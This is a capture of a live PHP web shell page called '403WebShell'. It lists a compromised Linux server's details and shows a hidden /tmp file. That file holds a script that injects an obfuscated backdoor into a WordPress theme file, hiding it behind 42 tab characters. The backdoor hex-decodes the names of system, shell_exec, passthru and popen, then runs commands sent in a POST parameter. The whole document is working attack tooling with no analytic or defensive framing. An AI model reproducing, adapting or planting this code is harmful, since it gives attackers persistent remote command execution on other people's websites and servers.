403WebShell

403Webshell

Server IP : 192.64.112.168 / Your IP : 3.16.212.0
Web Server : Apache
System : Linux nc-ph-2300-85.bluforrest.com 4.18.0-513.9.1.el8_9.x86_64 #1 SMP Sat Dec 2 05:23:44 EST 2023 x86_64
User : expressoneac ( 1128)
PHP Version : 8.0.30
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /tmp/

Upload File :

[ Back ]

Current File : /tmp/.ob_iconv_handle

<?php  $path = '/home/celebrategoodtim/public_html/wp-content/themes/twentytwentytwo/inc/patterns/general-divider-light.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24param1%20%3D%20%27736%27%3B%24param2%20%3D%20%276c6%27%3B%24param3%20%3D%20%27657%27%3B%24param4%20%3D%20%27706%27%3B%24param5%20%3D%20%27468%27%3B%24param6%20%3D%20%27727%27%3B%24param7%20%3D%20%27f70%27%3B%24param8%20%3D%20%27737%27%3B%24param9%20%3D%20%27656%27%3B%24param10%20%3D%20%2716d%27%3B%24param11%20%3D%20%27765%27%3B%24param12%20%3D%20%27745%27%3B%24param13%20%3D%20%27e74%27%3B%24param14%20%3D%20%2736c%27%3B%24param15%20%3D%20%276f7%27%3B%24param16%20%3D%20%27365%27%3B%24param17%20%3D%20%2736f%27%3B%24param18%20%3D%20%27665%27%3B%24locked1%20%3D%20pack%28%22H%2A%22%2C%20%27737%27.%27973%27.%27746%27.%2756d%27%29%3B%24locked2%20%3D%20pack%28%22H%2A%22%2C%20%24param1.%27865%27.%24param2.%27c5f%27.%24param3.%27865%27%29%3B%24locked3%20%3D%20pack%28%22H%2A%22%2C%20%24param3.%27865%27%29%3B%24locked4%20%3D%20pack%28%22H%2A%22%2C%20%24param4.%27173%27.%27737%27.%24param5.%24param6%29%3B%24locked5%20%3D%20pack%28%22H%2A%22%2C%20%27706%27.%24param7.%27656%27%29%3B%24locked6%20%3D%20pack%28%22H%2A%22%2C%20%24param8.%27472%27.%24param9.%24param10.%275f6%27.%24param11.%24param12.%27f63%27.%276f6%27.%24param13.%24param9.%27e74%27%29%3B%24locked7%20%3D%20pack%28%22H%2A%22%2C%20%24param4.%24param14.%24param15.%24param16%29%3B%24uconvert%20%3D%20pack%28%22H%2A%22%2C%20%27756%27.%24param17.%276e7%27.%24param18.%24param6%29%3Bif%28isset%28%24_POST%5B%24uconvert%5D%29%29%7B%24uconvert%3Dpack%28%22H%2A%22%2C%24_POST%5B%24uconvert%5D%29%3Bif%28function_exists%28%24locked1%29%29%7B%24locked1%28%24uconvert%29%3B%7Delseif%28function_exists%28%24locked2%29%29%7Bprint%20%24locked2%28%24uconvert%29%3B%7Delseif%28function_exists%28%24locked3%29%29%7B%24locked3%28%24uconvert%2C%24constant_attr%29%3Bprint%20join%28%22%5Cn%22%2C%24constant_attr%29%3B%7Delseif%28function_exists%28%24locked4%29%29%7B%24locked4%28%24uconvert%29%3B%7Delseif%28function_exists%28%24locked5%29%26%26function_exists%28%24locked6%29%26%26function_exists%28%24locked7%29%29%7B%24argument_st%3D%24locked5%28%24uconvert%2C%22r%22%29%3Bif%28%24argument_st%29%7B%24storage_prop%3D%24locked6%28%24argument_st%29%3B%24locked7%28%24argument_st%29%3Bprint%20%24storage_prop%3B%7D%7Dexit%3B%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');

Youez - 2016 - github.com/yon3zu
LinuXploit